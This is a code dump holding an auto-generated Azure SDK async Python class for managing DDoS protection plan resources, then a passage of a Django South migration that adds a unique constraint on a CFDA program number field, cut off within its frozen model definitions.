from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DdosProtectionPlansOperations:
"""DdosProtectionPlansOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified DDoS protection plan.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ddos_protection_plan_name: The name of the DDoS protection plan.
:type ddos_protection_plan_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
ddos_protection_plan_name=ddos_protection_plan_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
async def get(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
**kwargs: Any
) -> "_models.DdosProtectionPlan":
"""Gets information about the specified DDoS protection plan.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ddos_protection_plan_name: The name of the DDoS protection plan.
:type ddos_protection_plan_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DdosProtectionPlan, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlan
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlan"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DdosProtectionPlan', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
parameters: "_models.DdosProtectionPlan",
**kwargs: Any
) -> "_models.DdosProtectionPlan":
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlan"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'DdosProtectionPlan')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('DdosProtectionPlan', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('DdosProtectionPlan', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
ddos_protection_plan_name: str,
parameters: "_models.DdosProtectionPlan",
**kwargs: Any
) -> AsyncLROPoller["_models.DdosProtectionPlan"]:
"""Creates or updates a DDoS protection plan.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param ddos_protection_plan_name: The name of the DDoS protection plan.
:type ddos_protection_plan_name: str
:param parameters: Parameters supplied to the create or update operation.
:type parameters: ~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlan
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either DdosProtectionPlan or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlan]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlan"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
ddos_protection_plan_name=ddos_protection_plan_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('DdosProtectionPlan', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'ddosProtectionPlanName': self._serialize.url("ddos_protection_plan_name", ddos_protection_plan_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans/{ddosProtectionPlanName}'} # type: ignore
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.DdosProtectionPlanListResult"]:
"""Gets all DDoS protection plans in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DdosProtectionPlanListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlanListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlanListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DdosProtectionPlanListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ddosProtectionPlans'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DdosProtectionPlanListResult"]:
"""Gets all the DDoS protection plans in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DdosProtectionPlanListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_02_01.models.DdosProtectionPlanListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DdosProtectionPlanListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DdosProtectionPlanListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ddosProtectionPlans'} # type: ignore
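# A minimal usage sketch (assumes this operation group is reached through a
# configured async NetworkManagementClient; all names are illustrative):
#
#     poller = await client.ddos_protection_plans.begin_delete(
#         resource_group_name="my-rg",
#         ddos_protection_plan_name="my-plan",
#     )
#     await poller.result()   # resolves once the long-running op completes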
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_02_01/aio/operations/_ddos_protection_plans_operations.py
|
Python
|
mit
| 23,738
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'Cfda', fields ['program_number']
db.create_unique('data_cfda', ['program_number'])
def backwards(self, orm):
# Removing unique constraint on 'Cfda', fields ['program_number']
db.delete_unique('data_cfda', ['program_number'])
models = {
'data.agegroup': {
'Meta': {'object_name': 'AgeGroup'},
'age_group_desc': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'age_group_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.alternativefuelvehicles': {
'Meta': {'object_name': 'AlternativeFuelVehicles'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.annualstateenergyexpenditures': {
'Meta': {'object_name': 'AnnualStateEnergyExpenditures'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.ansicountystate': {
'Meta': {'object_name': 'AnsiCountyState'},
'ansi_class': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'ansi_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.ansistate': {
'Meta': {'object_name': 'AnsiState'},
'ansi_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'gnisid': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state_name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'data.atcodes': {
'Meta': {'object_name': 'AtCodes'},
'assistance_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'data.averageteachersalary': {
'Meta': {'object_name': 'AverageTeacherSalary'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.bilingualedspending': {
'Meta': {'object_name': 'BilingualEdSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.budgetcategorysubfunctions': {
'Meta': {'object_name': 'BudgetCategorySubfunctions'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'npp_budget_category': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'subfunction': ('django.db.models.fields.TextField', [], {'max_length': '3'})
},
'data.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'data.cfda': {
'Meta': {'object_name': 'Cfda'},
'accomplishments': ('django.db.models.fields.TextField', [], {}),
'account_id': ('django.db.models.fields.TextField', [], {}),
'agency_name': ('django.db.models.fields.TextField', [], {}),
'appeals': ('django.db.models.fields.TextField', [], {}),
'applicant_eligibility': ('django.db.models.fields.TextField', [], {}),
'application_procedure': ('django.db.models.fields.TextField', [], {}),
'approval_time_range': ('django.db.models.fields.TextField', [], {}),
'assistance_length_time': ('django.db.models.fields.TextField', [], {}),
'assistance_type': ('django.db.models.fields.TextField', [], {}),
'audits': ('django.db.models.fields.TextField', [], {}),
'authorization': ('django.db.models.fields.TextField', [], {}),
'award_procedure': ('django.db.models.fields.TextField', [], {}),
'beneficiary_eligibility': ('django.db.models.fields.TextField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'credentials': ('django.db.models.fields.TextField', [], {}),
'deadline': ('django.db.models.fields.TextField', [], {}),
'example_projects': ('django.db.models.fields.TextField', [], {}),
'formula_matching_grant_request': ('django.db.models.fields.TextField', [], {}),
'headquarters_office': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'objective': ('django.db.models.fields.TextField', [], {}),
'obligations': ('django.db.models.fields.TextField', [], {}),
'omb_agency_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'omb_bureau_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'popular_name': ('django.db.models.fields.TextField', [], {}),
'preapplication_coordination': ('django.db.models.fields.TextField', [], {}),
'program_number': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
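            # unique=True on program_number mirrors the constraint that
            # forwards() adds at the database level.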
'program_title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'published_date': ('django.db.models.fields.DateTimeField', [], {}),
'range_average_assistance': ('django.db.models.fields.TextField', [], {}),
'record': ('django.db.models.fields.TextField', [], {}),
'recovery_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'regional_local_office': ('django.db.models.fields.TextField', [], {}),
'regulations': ('django.db.models.fields.TextField', [], {}),
'renewal': ('django.db.models.fields.TextField', [], {}),
'reports': ('django.db.models.fields.TextField', [], {}),
'selection_criteria': ('django.db.models.fields.TextField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'use': ('django.db.models.fields.TextField', [], {}),
'web_address': ('django.db.models.fields.TextField', [], {})
},
'data.cffr': {
'Meta': {'unique_together': "(('year', 'state', 'county', 'cffrprogram'),)", 'object_name': 'Cffr'},
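            # unique_together is serialized as a string literal inside the
            # frozen Meta; South evaluates it when reconstructing the model.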
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_per_capita': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'cffrprogram': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.CffrProgram']"}),
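            # Foreign keys are frozen as "orm['app.Model']" strings; South
            # resolves them against this models dict, not the live classes.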
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffragency': {
'Meta': {'object_name': 'CffrAgency'},
'agency_code': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '90'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrgeo': {
'Meta': {'object_name': 'CffrGeo'},
'congress_district': ('django.db.models.fields.CharField', [], {'max_length': '34', 'null': 'True'}),
'county_code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county_gu': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'place_code': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'place_gu': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'place_name': ('django.db.models.fields.CharField', [], {'max_length': '24'}),
'population': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'split_gu': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'state_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state_gu': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'type_gu': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrindividualcounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'CffrIndividualCounty'},
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_per_capita': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrindividualstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'CffrIndividualState'},
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_per_capita': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrobjectcode': {
'Meta': {'object_name': 'CffrObjectCode'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_code': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.cffrprogram': {
'Meta': {'unique_together': "(('year', 'program_code'),)", 'object_name': 'CffrProgram'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'program_code': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
'program_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'program_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrprogramraw': {
'Meta': {'object_name': 'CffrProgramRaw'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'program_id_code': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
'program_name': ('django.db.models.fields.CharField', [], {'max_length': '74'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrraw': {
'Meta': {'object_name': 'CffrRaw'},
'agency_code': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_adjusted': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'congress_district': ('django.db.models.fields.CharField', [], {'max_length': '34', 'null': 'True'}),
'county_code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '24', 'null': 'True'}),
'funding_sign': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'place_code': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'place_name': ('django.db.models.fields.CharField', [], {'max_length': '24', 'null': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'program_code': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
'state_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state_postal': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.cffrstate': {
'Meta': {'unique_together': "(('year', 'state', 'cffrprogram'),)", 'object_name': 'CffrState'},
'amount': ('django.db.models.fields.BigIntegerField', [], {}),
'amount_per_capita': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'cffrprogram': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.CffrProgram']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
